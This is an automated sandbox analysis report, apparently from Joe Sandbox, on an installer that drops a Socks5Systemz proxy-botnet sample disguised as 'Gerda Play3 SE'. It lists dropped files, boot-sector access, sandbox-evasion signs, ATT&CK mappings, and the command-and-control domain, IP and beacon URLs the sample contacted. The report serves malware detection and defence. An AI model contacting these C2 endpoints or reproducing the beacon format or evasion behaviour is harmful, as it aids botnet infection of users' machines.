Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Gerda Play3 SE\libssl-1_1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Gerda Play3 SE\is-3CJHL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Gerda Play3 SE\msvcr71.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	File created: C:\ProgramData\Eclipse IO Library 9.27.43\Eclipse IO Library 9.27.43.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Gerda Play3 SE\Qt5OpenGL.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Gerda Play3 SE\is-RDVP8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Gerda Play3 SE\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Gerda Play3 SE\msvcp71.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Gerda Play3 SE\uninstall\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Gerda Play3 SE\is-UG21C.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_setup64.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

File created: C:\ProgramData\Eclipse IO Library 9.27.43\Eclipse IO Library 9.27.43.exe

Jump to dropped file

Boot Survival

Contains functionality to infect the boot sector

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0		3_2_00401A4F
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0		3_2_02D6F7DA

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Code function: 3_2_0040254E StartServiceCtrlDispatcherA,

3_2_0040254E

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	1_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	1_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus,	1_2_004241EC
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004241A4 IsIconic,SetActiveWindow,	1_2_004241A4
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	1_2_00418394
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	1_2_0042286C
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0042F2F0 IsIconic,GetWindowLongA,GetWindowLongA,GetActiveWindow,MessageBoxA,SetActiveWindow,GetActiveWindow,MessageBoxA,SetActiveWindow,	1_2_0042F2F0
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004175A8 IsIconic,GetCapture,	1_2_004175A8
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00417CDE IsIconic,SetWindowPos,	1_2_00417CDE
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	1_2_00417CE0
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00483E20 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,	1_2_00483E20

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

Code function: 1_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

1_2_0041F128

Source: C:\Users\user\Desktop\file.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,		3_2_00401B4B
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,		3_2_02D6F8DE

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Window / User API: threadDelayed 3878			Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Window / User API: threadDelayed 5987			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\is-N5JHT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\is-REN2E.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\uninstall\is-GKUSE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\is-8SV2U.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\libssl-1_1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\is-3CJHL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\msvcr71.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\Qt5OpenGL.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\is-RDVP8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\msvcp71.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\uninstall\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Gerda Play3 SE\is-UG21C.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_setup64.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetSystemTime,DecisionNodes

graph_0-5968

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_3-18358

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe TID: 4196	Thread sleep count: 3878 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe TID: 4196	Thread sleep time: -7756000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe TID: 7144	Thread sleep count: 73 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe TID: 7144	Thread sleep time: -4380000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe TID: 4196	Thread sleep count: 5987 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe TID: 4196	Thread sleep time: -11974000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00452AD4 FindFirstFileA,GetLastError,	1_2_00452AD4
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004753C4 FindFirstFileA,FindNextFileA,FindClose,	1_2_004753C4
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00464200 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_00464200
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0049877C FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	1_2_0049877C
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004627F8 FindFirstFileA,FindNextFileA,FindClose,	1_2_004627F8
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00463D84 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_00463D84

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

0_2_00409B78

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: gerdaplay3se.exe, 00000003.00000002.3369142149.0000000000798000.00000004.00000020.00020000.00000000.sdmp, gerdaplay3se.exe, 00000003.00000002.3369142149.0000000000884000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-6765
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	API call chain: ExitProcess graph end node	graph_3-18360
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	API call chain: ExitProcess graph end node	graph_3-19648

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Code function: 3_2_02D800FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,

3_2_02D800FE

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

3_2_02D800FE

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

Code function: 1_2_00450334 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00450334

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Code function: 3_2_02D6648B RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,

3_2_02D6648B

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Code function: 3_2_02D79468 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_02D79468

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

Code function: 1_2_00478940 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

1_2_00478940

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

Code function: 1_2_0042EE28 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,

1_2_0042EE28

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

Code function: 1_2_0042E0AC AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,

1_2_0042E0AC

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Code function: 3_2_02D6F792 cpuid

3_2_02D6F792

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,	0_2_0040520C
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,	0_2_00405258
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: GetLocaleInfoA,	1_2_00408578
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: GetLocaleInfoA,	1_2_004085C4

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

Code function: 1_2_00458670 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,

1_2_00458670

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004026C4 GetSystemTime,

0_2_004026C4

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

Code function: 1_2_00455644 GetUserNameA,

1_2_00455644

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405CF4 GetVersionExA,

0_2_00405CF4

Stealing of Sensitive Information

Yara detected Socks5Systemz

Source: Yara match	File source: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3371905613.0000000002721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gerdaplay3se.exe PID: 4052, type: MEMORYSTR

Remote Access Functionality

Yara detected Socks5Systemz

Source: Yara match	File source: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3371905613.0000000002721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gerdaplay3se.exe PID: 4052, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	3 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	4 Windows Service	1 DLL Side-Loading	2 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	1 Bootkit	1 Access Token Manipulation	2 Software Packing	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	4 Windows Service	1 DLL Side-Loading	NTDS	35 System Information Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	2 Process Injection	1 Masquerading	LSA Secrets	41 Security Software Discovery	SSH	Keylogging	112 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Process Injection	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Bootkit	/etc/passwd and /etc/shadow	3 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner
C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	100%	Joe Sandbox ML
C:\ProgramData\Eclipse IO Library 9.27.43\Eclipse IO Library 9.27.43.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Gerda Play3 SE\Qt5OpenGL.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Gerda Play3 SE\is-3CJHL.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Gerda Play3 SE\is-8SV2U.tmp	5%	ReversingLabs
C:\Users\user\AppData\Local\Gerda Play3 SE\is-N5JHT.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Gerda Play3 SE\is-RDVP8.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Gerda Play3 SE\is-REN2E.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Gerda Play3 SE\is-UG21C.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Gerda Play3 SE\libeay32.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Gerda Play3 SE\libssl-1_1.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Gerda Play3 SE\msvcp71.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Gerda Play3 SE\msvcr71.dll (copy)	5%	ReversingLabs
C:\Users\user\AppData\Local\Gerda Play3 SE\ssleay32.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_iscrypt.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_shfoldr.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://www.innosetup.com/	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
https://www.certum.pl/CPS0	0%	URL Reputation	safe
http://www.openssl.org/support/faq.html	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	0%	URL Reputation	safe
http://crl.thawte.com/ThawteTimestampingCA.crl0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://www.openssl.org/H	0%	URL Reputation	safe
http://www.remobjects.com/ps	0%	URL Reputation	safe
http://www.openssl.org/f	0%	URL Reputation	safe
http://www.certum.pl/CPS0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ceyqbgr.net	185.208.158.248	true	true		unknown
18.31.95.13.in-addr.arpa	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Reputation
http://ceyqbgr.net/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf815c5ee949b32	true	unknown
http://ceyqbgr.net/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f	true	unknown
ceyqbgr.net	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.innosetup.com/	file.tmp, file.tmp, 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-GKUSE.tmp.1.dr	false	URL Reputation: safe	unknown
https://sectigo.com/CPS0	is-UG21C.tmp.1.dr	false	URL Reputation: safe	unknown
http://repository.certum.pl/ctnca.cer09	is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	false		unknown
http://repository.certum.pl/cscasha2.cer0	is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	false		unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	is-UG21C.tmp.1.dr	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	is-UG21C.tmp.1.dr	false	URL Reputation: safe	unknown
http://crl.certum.pl/ctnca.crl0k	is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	false		unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	file.exe	false		unknown
http://ocsp.thawte.com0	is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	is-UG21C.tmp.1.dr	false	URL Reputation: safe	unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline	file.exe	false		unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	is-UG21C.tmp.1.dr	false	URL Reputation: safe	unknown
https://www.certum.pl/CPS0	is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	false	URL Reputation: safe	unknown
http://crl.certum.pl/cscasha2.crl0q	is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	false		unknown
http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948	gerdaplay3se.exe, 00000003.00000002.3373409541.0000000003614000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://cscasha2.ocsp-certum.com04	is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	false		unknown
http://www.openssl.org/support/faq.html	is-N5JHT.tmp.1.dr	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	is-UG21C.tmp.1.dr	false	URL Reputation: safe	unknown
